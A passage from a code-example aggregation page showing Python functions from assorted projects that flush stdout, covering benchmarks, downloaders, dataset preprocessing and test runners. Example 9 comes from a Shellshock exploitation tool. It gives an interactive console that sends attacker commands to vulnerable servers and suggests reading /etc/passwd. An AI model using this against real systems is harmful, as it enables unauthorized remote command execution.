                        print '* You can try to download this file separately',
                        print 'and rerun this script'
                        raise Exception()
                
                except KeyboardInterrupt:
                    print '[KeyboardInterrupt]'
                    return False

                except Exception, e:
                    print e

            if not completed: return False

        return True

Example 7

Project: ten-tips-for-pythonic-code-jetbrains-webcast Source File: a_dicts_for_perf.py
Function: main
def main():
    # #############################
    print("Creating data...", end=' ')
    sys.stdout.flush()

    data_list = []
    random.seed(0)
    for d_id in range(500000):
        x = random.randint(0, 1000)
        y = random.randint(0, 1000)
        temp = random.randint(-10, 50)
        quality = random.random()
        data_list.append(DataPoint(d_id, x, y, temp, quality))

    print("done.")
    sys.stdout.flush()

    # #############################
    print("Simulating randomized data ...", end=' ')
    sys.stdout.flush()

    data_list.sort(key=lambda d: d.quality)

    print("done.")

    # Create a list of random IDs to locate without duplication
    interesting_ids = list({random.randint(0, len(data_list)) for _ in range(0, 100)})
    print("Creating {} interesting IDs to seek.".format(len(interesting_ids)))

    # #############################
    print("Locating data in list...", end=' ')
    sys.stdout.flush()

    t0 = datetime.datetime.now()
    interesting_points = []
    for i in interesting_ids:
        pt = find_point_by_id_in_list(data_list, i)
        interesting_points.append(pt)

    t1 = datetime.datetime.now()
    dt_list = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("DT: {} sec".format(dt_list))
    print(interesting_points)

    # #############################
    t0 = datetime.datetime.now()

    print("Creating dictionary...", end='')
    data_lookup = {d.id: d for d in data_list}

    print("done.")
    sys.stdout.flush()

    print("Locating data in dictionary...", end=' ')
    sys.stdout.flush()

    #    t0 = datetime.datetime.now()
    interesting_points = []
    for i in interesting_ids:
        item = data_lookup[i]
        interesting_points.append(item)

    t1 = datetime.datetime.now()
    dt_dict = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("DT: {} sec".format(dt_dict))
    print(interesting_points)
    print()
    print("Speedup from dict: {:,.0f}x".format(round(dt_list / dt_dict)))

Example 8

Project: nrvr-commander Source File: cygwin.py
    @classmethod
    def forArch(cls, arch, packageDirs,
                force=False, mirror="http://mirrors.kernel.org/sourceware/cygwin/",
                noWait=False,
                dontDownload=False,
                ticker=True):
        """Download files or use previously downloaded files.
        
        As implemented uses wget.
        That has been a choice of convenience, could be written in Python instead.
        
        arch
            32 or 64.
        
        packageDirs
            a list of directories needed.
            
            You don't want to download all of Cygwin, only what is needed.
        
        force
            whether to force downloading even if apparently downloaded already.
            
            May be useful for programmatically updating at times.
        
        mirror
            URL of mirror to download from.
        
        noWait
            whether to forgo short waits between files.
            
            Be warned that frequent high use of bandwidth may be penalized by a server
            by refusal to serve anything at all to a specific client address or range of
            addresses.
        
        dontDownload
            whether you don't want to start a download, for some reason.
        
        Return directory path."""
        arch = Arch(arch)
        installerName = cls.installerName(arch)
        if arch == Arch(32):
            archPath = "x86"
        elif arch == Arch(64):
            archPath = "x86_64"
        else:
            raise Exception("unknown architecture arch=%s" % (arch))
        downloadDir = ScriptUser.loggedIn.userHomeRelative("Downloads")
        archDir = cls.basename(arch)
        downloadDir = os.path.join(downloadDir, archDir)
        semaphorePath = downloadDir + cls.semaphoreExtenstion
        #
        if os.path.exists(downloadDir) and not force:
            if not os.path.exists(semaphorePath):
                # directory exists and not download in progress,
                # assume it is good
                return downloadDir
            else:
                # directory exists and download in progress,
                # presumably from another script running in another process or thread,
                # wait for it to complete
                printed = False
                ticked = False
                # check the essential condition, initially and then repeatedly
                while os.path.exists(semaphorePath):
                    if not printed:
                        # first time only printing
                        print "waiting for " + semaphorePath + " to go away on completion"
                        sys.stdout.flush()
                        printed = True
                    if ticker:
                        if not ticked:
                            # first time only printing
                            sys.stdout.write("[")
                        sys.stdout.write(".")
                        sys.stdout.flush()
                        ticked = True
                    time.sleep(5)
                if ticked:
                    # final printing
                    sys.stdout.write("]\n")
                    sys.stdout.flush()
        elif not dontDownload: # it is normal to download
            if not os.path.exists(downloadDir):
                try:
                    os.makedirs(downloadDir)
                except OSError:
                    if os.path.exists(downloadDir): # concurrently made
                        pass
                    else: # failure
                        raise
            #
            # try downloading
            pid = os.getpid()
            try:
                with open(semaphorePath, "w") as semaphoreFile:
                    # create semaphore file
                    semaphoreFile.write("pid=" + str(pid))
                #
                print "starting to download " + archDir
                if ticker:
                    sys.stdout.write("[.")
                    sys.stdout.flush()
                try:
                    installerUrl = "http://cygwin.com/" + installerName
                    wget = CommandCapture(
                        ["wget",
                         "--quiet",
                         "--timestamping",
                         "-P", downloadDir,
                         installerUrl],
                        forgoPty=True)
                    #
                    if ticker:
                        sys.stdout.write(".")
                        sys.stdout.flush()
                    downloadPathRoot = posixpath.join(mirror, archPath) + "/"
                    downloadPathRootDepth = cls._directoryDepth(downloadPathRoot)
                    rejectList = "index.html*,*-src.tar.bz2,*-devel,*-devel-*,*-debuginfo,*-debuginfo-*"
                    wgetArgs = [
                        "wget",
                        "--quiet",
                        "--timestamping",
                        "--recursive",
                        "--no-host-directories",
                        "--cut-dirs", str(downloadPathRootDepth),
                        "--ignore-case",
                        "--reject", rejectList,
                        "-P", downloadDir,
                        "--no-parent",
                        "--level=1",
                        "-e", "robots=off",
                    ]
                    if not noWait:
                        wgetArgs.extend(["--wait=1", "--random-wait"])
                    wgetArgs.extend([downloadPathRoot])
                    wget = CommandCapture(wgetArgs, forgoPty=True)
                    #
                    downloadPackagesPath = posixpath.join(downloadPathRoot, "release") + "/"
                    #wildcardRegex = re.compile(r"^(.*)/([^/]*\*)$")
                    for packageDir in packageDirs:
                        if ticker:
                            sys.stdout.write(".")
                            sys.stdout.flush()
                        if not isinstance(packageDir, (tuple, list)): # e.g. "bash"
                            level = 1
                        else: # e.g. ("openssl", 2)
                            level = packageDir[1]
                            packageDir = packageDir[0]
                        downloadPath = posixpath.join(downloadPackagesPath, packageDir) + "/"
                        wgetArgs = [
                            "wget",
                            "--quiet",
                            "--timestamping",
                            "--recursive",
                            "--no-host-directories",
                            "--cut-dirs", str(downloadPathRootDepth),
                            "--ignore-case",
                            "--reject", rejectList,
                            "-P", downloadDir,
                            "--no-parent",
                            "--level", str(level),
                            "-e", "robots=off",
                        ]
                        if not noWait:
                            wgetArgs.extend(["--wait=1", "--random-wait"])
                        wgetArgs.extend([downloadPath])
                        wget = CommandCapture(wgetArgs, forgoPty=True)
                    if ticker:
                        sys.stdout.write("]")
                        sys.stdout.flush()
                finally:
                    if ticker:
                        sys.stdout.write("\n")
                        sys.stdout.flush()
            except: # apparently a problem
                print "problem downloading " + archDir
                raise
            else:
                print "done downloading " + archDir
            finally:
                try:
                    # delete semaphore file
                    os.remove(semaphorePath)
                except:
                    pass
        if os.path.exists(downloadDir):
            # directory exists now, assume it is good
            return downloadDir
        else:
            # apparently download has failed
            raise IOError("directory not found " + downloadDir)

Example 9

Project: shocker Source File: shocker.py
def ask_for_console(proxy, successful_targets, verbose):
    """ With any discovered vulnerable servers asks user if they
    would like to choose one of these to send further commands to
    in a semi interactive way
    successful_targets is a dictionary:
    {url: (header, exploit)}
    """

    # Initialise to non zero to enter while loop
    user_input = 1
    ordered_url_list = successful_targets.keys()
    
    while user_input is not 0:
        result = ""
        print "[+] The following URLs appear to be exploitable:"
        for x in range(len(ordered_url_list)):
            print "  [%i] %s" % (x+1, ordered_url_list[x])
        print "[+] Would you like to exploit further?"
        user_input = raw_input("[>] Enter an URL number or 0 to exit: ")
        sys.stdout.flush()
        try:
            user_input = int(user_input)
        except:
            continue
        if user_input not in range(len(successful_targets)+1):
            print "[-] Please enter a number between 1 and %i (0 to exit)" % \
                                                            len(successful_targets)
            continue
        elif not user_input:
            continue
        target = ordered_url_list[user_input-1]
        header = successful_targets[target][0]
        print "[+] Entering interactive mode for %s" % target
        print "[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'"

        while True:
            command = ""
            result = ""
            sys.stdout.flush()
            command = raw_input("  > ")
            sys.stdout.flush()
            if command == "quit":
                sys.stdout.flush()
                print "[+] Exiting interactive mode..."
                sys.stdout.flush()
                break
            if command:
                attack = successful_targets[target][1] + command
                result = do_attack(proxy, target, header, attack, verbose)
            else:
                result = ""
            if result: 
                buf = StringIO.StringIO(result)
                for line in buf:
                    sys.stdout.flush()
                    print "  < %s" % line.strip()
                    sys.stdout.flush()
            else:
                sys.stdout.flush()
                print "  > No response"
                sys.stdout.flush()

Example 10

Project: pyNastran Source File: map_loads.py
    def build_mapping_matrix(self, debug=False):
        """
        Skips building the matrix if it already exists
        A mapping matrix translates element ID to loads on the nearby
        strucutral nodes.

        eid,distribution
        """
        if self.mapping_matrix != {}:
            return self.mapping_matrix

        log.info("---starting build_mapping_matrix---")
        #print("self.mapping_matrix = ",self.mapping_matrix)
        if os.path.exists('mappingMatrix.new.out'):
            self.mapping_matrix = self.parseMapFile('mappingMatrix.new.out')
            log.info("---finished build_mapping_matrix based on mappingMatrix.new.out---")
            sys.stdout.flush()
            return self.mapping_matrix
        log.info("...couldn't find 'mappingMatrix.new.out' in %r, so going to make it..." % os.getcwd())

        # this is the else...
        log.info("creating...")
        aero_model = self.aero_model
        structural_model = self.structural_model

        #aNodes = aero_model.getNodes()
        #sNodes = structural_model.getNodes()
        #treeObj = Tree(nClose=5)
        #tree    = treeObj.buildTree(aNodes,sNodes) # fromNodes,toNodes

        aElementIDs = aero_model.ElementIDs() # list
        sElementIDs = structural_model.getElementIDsWithPIDs() # list
        sElementIDs2 = structural_model.ElementIDs() # list

        msg = "there are no internal elements in the structural model?\n   ...len(sElementIDs)=%s len(sElementIDs2)=%s" % (
            len(sElementIDs), len(sElementIDs2))
        assert sElementIDs != sElementIDs2, msg
        log.info("maxAeroID=%s maxStructuralID=%s sElements=%s" % (max(aElementIDs), max(sElementIDs), len(sElementIDs2)))

        log.info("build_centroids - structural")
        sCentroids = self.build_centroids(structural_model, sElementIDs)
        self.build_centroid_tree(sCentroids)
        #self.buildNodalTree(sNodes)

        log.info("build_centroids - aero")
        aero_centroids = self.build_centroids(aero_model)

        with open('mappingMatrix.out', 'wb') as map_file:
            map_file.write('# aEID distribution (sEID:  weight)\n')

            t0 = time()
            nAeroElements = float(len(aElementIDs))
            log.info("---start piercing---")
            if debug:
                log.info("nAeroElements = %s" % nAeroElements)
            tEst = 1.
            tLeft = 1.
            percent_done = 0.

            if 1:
                num_cpus = 4
                pool = mp.Pool(num_cpus)
                result = pool.imap(self.map_loads_mp_func,
                                   [(aEID, aero_model) for aEID in aElementIDs])

                for j, return_values in enumerate(result):
                    aEID, distribution = return_values
                    #self.mappingMatrix[aEID] = distribution
                    map_file.write('%s %s\n' % (aEID, distribution))
                pool.close()
                pool.join()
            else:
                for (i, aero_eid) in enumerate(aElementIDs):
                    if i % 1000 == 0 and debug:
                        log.debug('  piercing %sth element' % i)
                        log.debug("tEst=%g minutes; tLeft=%g minutes; %.3f%% done" % (
                            tEst, tLeft, percent_done))
                        sys.stdout.flush()

                    aElement = aero_model.Element(aero_eid)
                    (aArea, aCentroid, aNormal) = aero_model.get_element_properties(aero_eid)
                    percentDone = i / nAeroElements * 100
                    if debug:
                        log.info('aEID=%s percentDone=%.2f aElement=%s aArea=%s aCentroid=%s aNormal=%s' %(
                            aero_eid, percentDone, aElement, aArea, aCentroid, aNormal))
                    pSource = aCentroid
                    (distribution) = self.pierce_elements(aCentroid, aero_eid, pSource, aNormal)
                    #(distribution)  = self.poorMansMapping(aCentroid, aero_eid, pSource, aNormal)
                    self.mapping_matrix[aero_eid] = distribution
                    map_file.write('%s %s\n' % (aero_eid, distribution))

                    dt = (time() - t0) / 60.
                    tEst = dt * nAeroElements / (i + 1)  # dtPerElement*nElements
                    tLeft = tEst - dt
                    percent_done = dt / tEst * 100.

        log.info("---finish piercing---")
        self.run_map_test(self.mapping_matrix)
        #print("mapping_matrix = ", self.mapping_matrix)
        log.info("---finished build_mapping_matrix---")
        sys.stdout.flush()
        return self.mapping_matrix

Example 11

Project: reseg Source File: helper_dataset.py
def preprocess_dataset(train, valid, test,
                       input_to_float,
                       preprocess_type,
                       patch_size, max_patches):

    if input_to_float and preprocess_type is None:
        train_norm = train[0].astype(floatX) / 255.
        train = (train_norm, train[1])
        valid_norm = valid[0].astype(floatX) / 255.
        valid = (valid_norm, valid[1])
        test_norm = test[0].astype(floatX) / 255.
        test = (test_norm, test[1])

    if preprocess_type is None:
        return train, valid, test

    # whiten, LCN, GCN, Local Mean Subtract, or normalize
    if len(train[0]) > 0:
        train_pre = []
        print ""
        print "Preprocessing {} images of the train set with {} {} ".format(
            len(train[0]), preprocess_type, patch_size),
        print ""
        i = 0
        print "Progress: {0:.3g} %".format(i * 100 / len(train[0])),
        for i, x in enumerate(train[0]):
            img = np.expand_dims(x, axis=0)
            x_pre = preprocess(img, preprocess_type,
                               patch_size,
                               max_patches)
            train_pre.append(x_pre[0])
            print "\rProgress: {0:.3g} %".format(i * 100 / len(train[0])),
            sys.stdout.flush()

        if input_to_float:
            train_pre = np.array(train_pre).astype(floatX) / 255.
        train = (np.array(train_pre), np.array(train[1]))

    if len(valid[0]) > 0:
        valid_pre = []
        print ""
        print "Preprocessing {} images of the valid set with {} {} ".format(
            len(valid[0]), preprocess_type, patch_size),
        print ""
        i = 0
        print "Progress: {0:.3g} %".format(i * 100 / len(valid[0])),
        for i, x in enumerate(valid[0]):
            img = np.expand_dims(x, axis=0)
            x_pre = preprocess(img, preprocess_type,
                               patch_size,
                               max_patches)
            valid_pre.append(x_pre[0])
            print "\rProgress: {0:.3g} %".format(i * 100 / len(valid[0])),
            sys.stdout.flush()

        if input_to_float:
            valid_pre = np.array(valid_pre).astype(floatX) / 255.
        valid = (np.array(valid_pre), np.array(valid[1]))

    if len(test[0]) > 0:
        test_pre = []
        print ""
        print "Preprocessing {} images of the test set with {} {} ".format(
            len(test[0]), preprocess_type, patch_size),
        print ""
        i = 0
        print "Progress: {0:.3g} %".format(i * 100 / len(test[0])),
        for i, x in enumerate(test[0]):
            img = np.expand_dims(x, axis=0)
            x_pre = preprocess(img, preprocess_type,
                               patch_size,
                               max_patches)
            test_pre.append(x_pre[0])
            print "\rProgress: {0:.3g} %".format(i * 100 / len(test[0])),
            sys.stdout.flush()

        if input_to_float:
            test_pre = np.array(test_pre).astype(floatX) / 255.
        test = (np.array(test_pre), np.array(test[1]))

    return train, valid, test

Example 12

Project: pyzui Source File: benchmark.py
Function: benchmark
def benchmark(filename, ppmfile):
    print "Benchmarking %s ..." % os.path.basename(filename)

    base_mem = mem()

    ## conversion
    c = MagickConverter(filename, ppmfile)
    start_time = time.time()
    print "Converting to PPM...",
    sys.stdout.flush()
    c.run()
    end_time = time.time()
    print "Done: took %.2fs" % (end_time - start_time)
    del c

    ## metadata
    f = open(ppmfile, 'rb')
    w,h = read_ppm_header(f)
    f.close()
    print "Dimensions: %dx%d, %.2f megapixels" % (w, h, w * h * 1e-6)
    del f, w, h

    ## tiling
    t = PPMTiler(ppmfile)
    start_time = time.time()
    print "Tiling...",
    sys.stdout.flush()
    t.run()
    end_time = time.time()

    ## in general, python doesn't necessarily return allocated memory to the OS
    ## (see <http://effbot.org/pyfaq/
    ## why-doesnt-python-release-the-memory-when-i-delete-a-large-object.htm>)
    ## so the current memory usage is likely to be approximately equal to the
    ## peak memory usage during tiling
    ## however, it would probably be better to periodically check memory usage
    ## while the tiler is running and maintain a max value
    end_mem = mem()

    print "Done: took %.2fs consuming %.2fMB RAM" % \
        ((end_time - start_time), (end_mem - base_mem) * 1e-3)
    del t

    ## zooming
    viewport_w = 800
    viewport_h = 600
    print "Viewport: %dx%d" % (viewport_w, viewport_h)
    zoom_amount = 5.0
    print "Zoom amount: %.1f" % zoom_amount

    qzui = QZUI()
    qzui.framerate = None
    qzui.resize(viewport_w, viewport_h)
    qzui.show()

    scene = Scene.new()
    qzui.scene = scene
    obj = TiledMediaObject(ppmfile, scene, True)
    scene.add(obj)
    obj.fit((0, 0, viewport_w, viewport_h))

    start_time = time.time()
    print "Zooming (cold)...",
    sys.stdout.flush()
    num_frames = 100
    for i in xrange(num_frames):
        qzui.repaint()
        scene.centre = (viewport_w/2, viewport_h/2)
        scene.zoom(zoom_amount/num_frames)
    end_time = time.time()
    print "Done: %d frames took %.2fs, mean framerate %.2f FPS" % \
        (num_frames, (end_time - start_time),
        num_frames / (end_time - start_time))

    scene.zoom(-zoom_amount)
    start_time = time.time()
    print "Zooming (warm)...",
    sys.stdout.flush()
    num_frames = 100
    for i in xrange(num_frames):
        qzui.repaint()
        scene.centre = (viewport_w/2, viewport_h/2)
        scene.zoom(zoom_amount/num_frames)
    end_time = time.time()
    print "Done: %d frames took %.2fs, mean framerate %.2f FPS" % \
        (num_frames, (end_time - start_time),
        num_frames / (end_time - start_time))

Example 13

Project: models Source File: build_imagenet_data.py
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      synset = synsets[i]
      human = humans[i]
      bbox = bboxes[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    synset, human, bbox,
                                    height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    writer.close()
    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()

Example 14

Project: internetarchive Source File: files.py
Function: download
    def download(self, file_path=None, verbose=None, silent=None, ignore_existing=None,
                 checksum=None, destdir=None, retries=None, ignore_errors=None):
        """Download the file into the current working directory.

        :type file_path: str
        :param file_path: Download file to the given file_path.

        :type verbose: bool
        :param verbose: (optional) Turn on verbose output.

        :type silent: bool
        :param silent: (optional) Suppress all output.

        :type ignore_existing: bool
        :param ignore_existing: Overwrite local files if they already
                                exist.

        :type checksum: bool
        :param checksum: (optional) Skip downloading file based on checksum.

        :type destdir: str
        :param destdir: (optional) The directory to download files to.

        :type retries: int
        :param retries: (optional) The number of times to retry on failed
                        requests.

        :type ignore_errors: bool
        :param ignore_errors: (optional) Don't fail if a single file fails to
                              download, continue to download other files.

        :rtype: bool
        :returns: True if file was successfully downloaded.
        """
        verbose = False if verbose is None else verbose
        silent = False if silent is None else silent
        ignore_existing = False if ignore_existing is None else ignore_existing
        checksum = False if checksum is None else checksum
        retries = 2 if not retries else retries
        ignore_errors = False if not ignore_errors else ignore_errors

        self.item.session._mount_http_adapter(max_retries=retries)
        file_path = self.name if not file_path else file_path

        if destdir:
            if not os.path.exists(destdir):
                os.mkdir(destdir)
            if os.path.isfile(destdir):
                raise IOError('{} is not a directory!'.format(destdir))
            file_path = os.path.join(destdir, file_path)

        if os.path.exists(file_path):
            if ignore_existing:
                msg = 'skipping {0}, file already exists.'.format(file_path)
                log.info(msg)
                if verbose:
                    print(' ' + msg)
                elif silent is False:
                    print('.', end='')
                    sys.stdout.flush()
                return
            elif checksum:
                md5_sum = utils.get_md5(open(file_path, 'rb'))
                if md5_sum == self.md5:
                    msg = ('skipping {0}, '
                           'file already exists based on checksum.'.format(file_path))
                    log.info(msg)
                    if verbose:
                        print(' ' + msg)
                    elif silent is False:
                        print('.', end='')
                        sys.stdout.flush()
                    return
            else:
                st = os.stat(file_path)
                if (st.st_mtime == self.mtime) and (st.st_size == self.size) \
                        or self.name.endswith('_files.xml') and st.st_size != 0:
                    msg = ('skipping {0}, file already exists '
                           'based on length and date.'.format(file_path))
                    log.info(msg)
                    if verbose:
                        print(' ' + msg)
                    elif silent is False:
                        print('.', end='')
                        sys.stdout.flush()
                    return

        parent_dir = os.path.dirname(file_path)
        if parent_dir != '' and not os.path.exists(parent_dir):
            os.makedirs(parent_dir)

        try:
            response = self.item.session.get(self.url, stream=True, timeout=12)
            response.raise_for_status()

            chunk_size = 2048
            with open(file_path, 'wb') as f:
                for chunk in response.iter_content(chunk_size=chunk_size):
                    if chunk:
                        f.write(chunk)
                        f.flush()
        except (RetryError, HTTPError, ConnectTimeout,
                ConnectionError, socket.error, ReadTimeout) as exc:
            msg = ('error downloading file {0}, '
                   'exception raised: {1}'.format(file_path, exc))
            log.error(msg)
            if os.path.exists(file_path):
                os.remove(file_path)
            if verbose:
                print(' ' + msg)
            elif silent is False:
                print('e', end='')
                sys.stdout.flush()
            if ignore_errors is True:
                return False
            else:
                raise exc

        # Set mtime with mtime from files.xml.
        os.utime(file_path, (0, self.mtime))

        msg = 'downloaded {0}/{1} to {2}'.format(self.identifier,
                                                 self.name,
                                                 file_path)
        log.info(msg)
        if verbose:
            print(' ' + msg)
        elif silent is False:
            print('d', end='')
            sys.stdout.flush()
        return True

Example 15

Project: NIPAP Source File: bulk-string-replace.py
def replace(pattern, replacement):

    # Fetch prefixes matching the string to replace
    print "Fetching prefixes from NIPAP... ",
    sys.stdout.flush()
    n = 1
    prefix_list = []
    t0 = time.time()
    query = {
        'operator': 'or',
        'val1': {
            'operator': 'regex_match',
            'val1': 'description',
            'val2': pattern
        },
        'val2': {
            'operator': 'regex_match',
            'val1': 'node',
            'val2': pattern
        }
    }
    full_result = Prefix.search(query, { 'parents_depth': -1, 'max_result': BATCH_SIZE })
    prefix_result = full_result['result']
    prefix_list += prefix_result
    print len(prefix_list), 
    sys.stdout.flush()
    while len(prefix_result) == 100:
        full_result = Prefix.smart_search(pattern, { 'parents_depth': -1, 'max_result': BATCH_SIZE, 'offset': n * BATCH_SIZE })
        prefix_result = full_result['result']
        prefix_list += prefix_result
        print len(prefix_list), 
        sys.stdout.flush()
        n += 1

    t1 = time.time()
    print " done in %.1f seconds" % (t1 - t0)

    # Display list
    print_pattern = "%-2s%-14s%-2s%-30s%-20s%s"
    print "\n\nPrefixes to change:"
    print print_pattern % ("", "VRF", "", "Prefix", "Node", "Description")
    i_match = 0
    for i, prefix in enumerate(prefix_list):
        if prefix.match:
            print COLOR_RESET,
            print " -- %d --" % i
            color = COLOR_RED
        else:
            color = COLOR_RESET
            
        print (color + print_pattern) % (
            "-" if prefix.match else "",
            prefix.vrf.rt,
            prefix.type[0].upper(),
            (("  " * prefix.indent) + prefix.display_prefix)[:min([ len(prefix.display_prefix) + 2*prefix.indent, 30 ])],
            (prefix.node or '')[:min([ len(prefix.node or ''), 20 ])],
            (prefix.description or '')[:min([ len(prefix.description or ''), 900 ])]
        )
        if prefix.match:
            new_prefix_node = re.sub(pattern, replacement, (prefix.node or ''), flags=re.IGNORECASE)
            new_prefix_desc = re.sub(pattern, replacement, (prefix.description or ''), flags=re.IGNORECASE)
            print (COLOR_GREEN + print_pattern) % (
                "+",
                prefix.vrf.rt,
                prefix.type[0].upper(),
                ("  " * prefix.indent + prefix.display_prefix)[:min([ len(prefix.display_prefix) + 2*prefix.indent, 30 ])],
                new_prefix_node[:min([ len(new_prefix_node), 20 ])],
                new_prefix_desc[:min([ len(new_prefix_desc), 90 ])]
            )


    # reset colors
    print COLOR_RESET,

    # Perform action?
    print "Select replacements to perform"
    print "Enter comma-separated selection (eg. 5,7,10) or \"all\" for all prefixes."
    print "Prefix list with ! to invert selection (eg !5,7,10 to perform operation on all except the entered prefixes)"
    inp = raw_input("Selection: ").strip()

    if len(inp) == 0:
        print "Empty selection, quitting."
        sys.exit(0)

    invert = False
    if inp[0] == "!":
        inp = inp[1:]
        invert = True

    rename_all = False
    if inp == 'all':
        rename_all = True
        selection = []
    else:
        selection = inp.split(",")
        try:
            selection = map(lambda x: int(x.strip()), selection)
        except ValueError as e:
            print >> sys.stderr, "Could not parse selection: %s" % str(e)
            sys.exit(1)

    for i, prefix in enumerate(prefix_list):

        if prefix.match and ((invert and i not in selection) or (not invert and i in selection) or rename_all):
            if prefix.node is not None:
                prefix.node = re.sub(pattern, replacement, prefix.node, flags=re.IGNORECASE)
            if prefix.description is not None:
                prefix.description = re.sub(pattern, replacement, prefix.description, flags=re.IGNORECASE)

            print "Saving prefix %s..." % prefix.display_prefix
            prefix.save()

Example 16

Project: acousticbrainz-server Source File: hl_calc.py
def main(num_threads):
    print("High-level extractor daemon starting with %d threads" % num_threads)
    sys.stdout.flush()
    build_sha1 = get_build_sha1(HIGH_LEVEL_EXTRACTOR_BINARY)
    create_profile(PROFILE_CONF_TEMPLATE, PROFILE_CONF, build_sha1)
    db.init_db_engine(config.SQLALCHEMY_DATABASE_URI)

    num_processed = 0

    pool = {}
    docs = []
    while True:
        # Check to see if we need more database rows
        if len(docs) == 0:
            # Fetch more rows from the DB
            docs = db.data.get_unprocessed_highlevel_docuements()

            # We will fetch some rows that are already in progress. Remove those.
            in_progress = pool.keys()
            filtered = []
            for mbid, doc, id in docs:
                if mbid not in in_progress:
                    filtered.append((mbid, doc, id))
            docs = filtered

        if len(docs):
            # Start one docuement
            mbid, doc, id = docs.pop()
            th = HighLevel(mbid, doc, id)
            th.start()
            print("start %s" % mbid)
            sys.stdout.flush()
            pool[mbid] = th

        # If we're at max threads, wait for one to complete
        while True:
            if len(pool) == 0 and len(docs) == 0:
                if num_processed > 0:
                    print("processed %s docuements, none remain. Sleeping." % num_processed)
                    sys.stdout.flush()
                num_processed = 0
                # Let's be nice and not keep any connections to the DB open while we nap
                # TODO: Close connections when we're sleeping
                sleep(SLEEP_DURATION)

            for mbid in pool.keys():
                if not pool[mbid].is_alive():

                    # Fetch the data and clean up the thread object
                    hl_data = pool[mbid].get_data()
                    ll_id = pool[mbid].get_ll_id()
                    pool[mbid].join()
                    del pool[mbid]

                    try:
                        jdata = json.loads(hl_data)
                    except ValueError:
                        print("error %s: Cannot parse result docuement" % mbid)
                        print(hl_data)
                        sys.stdout.flush()
                        jdata = {}

                    db.data.write_high_level(mbid, ll_id, jdata, build_sha1)

                    print("done  %s" % mbid)
                    sys.stdout.flush()
                    num_processed += 1

            if len(pool) == num_threads:
                # tranquilo!
                sleep(.1)
            else:
                break

Example 17

Project: vispy Source File: _runners.py
def _examples(fnames_str):
    """Run examples and make sure they work.

    Parameters
    ----------
    fnames_str : str
        Can be a space-separated list of paths to test, or an empty string to
        auto-detect and run all examples.
    """
    import_dir, dev = _get_import_dir()
    reason = None
    if not dev:
        reason = 'Cannot test examples unless in vispy git directory'
    else:
        with use_log_level('warning', print_msg=False):
            good, backend = has_application(capable=('multi_window',))
        if not good:
            reason = 'Must have suitable app backend'
    if reason is not None:
        msg = 'Skipping example test: %s' % reason
        print(msg)
        raise SkipTest(msg)

    # if we're given individual file paths as a string in fnames_str,
    # then just use them as the fnames
    # otherwise, use the full example paths that have been
    # passed to us
    if fnames_str:
        fnames = fnames_str.split(' ')

    else:
        fnames = [op.join(d[0], fname)
                  for d in os.walk(op.join(import_dir, '..', 'examples'))
                  for fname in d[2] if fname.endswith('.py')]

    fnames = sorted(fnames, key=lambda x: x.lower())
    print(_line_sep + '\nRunning %s examples using %s backend'
          % (len(fnames), backend))
    op.join('tutorial', 'app', 'shared_context.py'),  # non-standard

    fails = []
    n_ran = n_skipped = 0
    t0 = time()
    for fname in fnames:
        n_ran += 1
        root_name = op.split(fname)
        root_name = op.join(op.split(op.split(root_name[0])[0])[1],
                            op.split(root_name[0])[1], root_name[1])
        good = True
        with open(fname, 'r') as fid:
            for _ in range(10):  # just check the first 10 lines
                line = fid.readline()
                if line == '':
                    break
                elif line.startswith('# vispy: ') and 'testskip' in line:
                    good = False
                    break
        if not good:
            n_ran -= 1
            n_skipped += 1
            continue
        sys.stdout.flush()
        cwd = op.dirname(fname)
        cmd = [sys.executable, '-c', _script.format(op.split(fname)[1][:-3])]
        sys.stdout.flush()
        stdout, stderr, retcode = run_subprocess(cmd, return_code=True,
                                                 cwd=cwd, env=os.environ)
        if retcode or len(stderr.strip()) > 0:
            # Skipping due to missing dependency is okay
            if "ImportError: " in stderr:
                print('S', end='')
            else:
                ext = '\n' + _line_sep + '\n'
                fails.append('%sExample %s failed (%s):%s%s%s'
                             % (ext, root_name, retcode, ext, stderr, ext))
                print(fails[-1])
        else:
            print('.', end='')
        sys.stdout.flush()
    print('')
    t = (': %s failed, %s succeeded, %s skipped in %s seconds'
         % (len(fails), n_ran - len(fails), n_skipped, round(time()-t0)))
    if len(fails) > 0:
